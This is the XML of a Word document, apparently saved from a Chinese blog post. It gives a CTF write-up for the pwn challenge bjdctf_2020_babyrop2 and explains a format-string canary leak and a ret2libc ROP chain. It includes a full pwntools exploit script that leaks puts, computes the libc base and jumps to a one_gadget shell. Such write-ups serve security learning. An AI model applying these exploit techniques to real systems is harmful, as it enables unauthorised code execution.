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fldChar w:fldCharType="begin"/>
      </w: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instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/bhxdn/p/12330580.html" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="幼圆" w:hAnsi="幼圆" w:eastAsia="幼圆" w:cs="幼圆"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/bhxdn/p/12330580.html</w:t>
      </w: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</w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts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这道题是一道基本题，正因为它经典，所以需要重点记录一下。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　这道题考察格式化字符串泄露canary，然后rop获得libc版本，之后拿到shell。拿到程序之后我们先检查一下保护。。。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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5600700" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="7620" b="13335"/>
            <wp:docPr id="7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　开启了堆栈不可执行和canary保护。接下来ida看一下伪代码吧！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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5924550" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810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　main函数中调用了三个函数，我们一个一个点进去看看，先看一下init()。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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3990975" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335"/>
            <wp:docPr id="2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　有点水文章了。。。第一和函数就是告诉我们说让门尽力泄露libc的版本。。。来，我们继续看第二个函数！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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4200525" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905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　很明显有一个格式化字符串漏洞，并且format是由我们控制的，这里呢，我们先算一下这个格式化字符串的偏移吧。你看scanf那里，允许我们输入6个字节。。。那么我们就开始撞运气泄露偏移吧。。。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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6953250" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="11430" b="3810"/>
            <wp:docPr id="6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　当我们输入泄露偏移为6处的地址时，找到6161也就是aa，那么说明格式化字符串的偏移就是6，这里我们就要泄露canary，canary是在rbp+8，那么我们只要算好偏移泄露就可以了。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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5867400" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="4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　这里的时候我们是输入了%6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3"/>
          <w:szCs w:val="23"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MathJax_Main" w:hAnsi="MathJax_Main" w:eastAsia="MathJax_Main" w:cs="MathJax_Main"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS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看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栈分布，说明我们只要输入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p,看栈分布，说明我们只要输入</w:t>
      </w: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p，就把canary泄露出来了。我们直接运行程序看看。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5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6838950" cy="1228725"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="8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　输出的这个就是canary，%p就是以十六进制输出数据。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　好，接下来我们看最后一个函数。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　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="幼圆" w:hAnsi="幼圆" w:eastAsia="幼圆" w:cs="幼圆"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="5C8EC6"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5114925" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="5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　就是简单的栈溢出，构造rop链了。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　接下来来看看payload怎么构造。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 w:line="240" w:lineRule="atLeast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p64(cancry)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= payload.rjust(0x20,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+=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'bbbbbbbb'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p64(pop_rdi)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p64(puts_got)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6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p64(puts_plt)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7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+= p64(ret_addr)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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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　　把rbp+8的位置放上canary，下来就是简单泄露libc版本，调用shell了。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3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>贴一下完整的exp：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bidi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pwn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2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time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3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4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 = process(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'./bjdctf_2020_babyrop2'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5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elf = ELF(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'./bjdctf_2020_babyrop2'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6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context.log_level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'debug'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7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8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p.recv()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9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'%7$p'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p.sendline(payload)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11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p.recvuntil(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'0x'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12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cancry = int(p.recv(16),16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13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14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puts_plt = 0x0400610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15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puts_got = elf.got[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'puts'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16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pop_rdi = 0x0400993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17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main_addr = elf.symbols[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'main'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18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ret_addr = 0x0400887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19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sleep(1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21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p64(cancry)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22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= payload.rjust(0x20,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23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+=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'bbbbbbbb'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24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p64(pop_rdi)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25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p64(puts_got)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26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p64(puts_plt)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27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p64(ret_addr)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28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p.recvuntil(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'story!\n'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29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p.sendline(payload)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puts_addr = u64(p.recv(6).ljust(8,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'\x00'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31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hex(puts_addr)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32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33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base_addr = puts_addr - 0x06f690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34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shell_addr = base_addr + 0x45216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35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p.recvuntil(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'story!\n'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36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p64(cancry)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37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= payload.rjust(0x20,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38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+=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'bbbbbbbb'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39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payload +=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p64(shell_addr)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40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p.sendline(payload)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41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p.interactive()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>42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6"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F6F8FA"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> p.close()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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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63CB4D5A"/>
    <w:rsid w:val="6F6C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img2018.cnblogs.com/common/1941744/202002/1941744-20200219110010132-696779207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img2018.cnblogs.com/common/1941744/202002/1941744-20200219105900297-218852480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img2018.cnblogs.com/common/1941744/202002/1941744-20200219105703913-2130959250.jpg" TargetMode="Externa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s://img2018.cnblogs.com/common/1941744/202002/1941744-20200219114643739-837575549.jpg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s://img2018.cnblogs.com/common/1941744/202002/1941744-20200219114304403-304863840.jpg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s://img2018.cnblogs.com/common/1941744/202002/1941744-20200219113933126-853741802.jpg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s://img2018.cnblogs.com/common/1941744/202002/1941744-20200219110537097-2018734951.jp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s://img2018.cnblogs.com/common/1941744/202002/1941744-20200219110115837-1408109641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2022-03-08T14:55:05Z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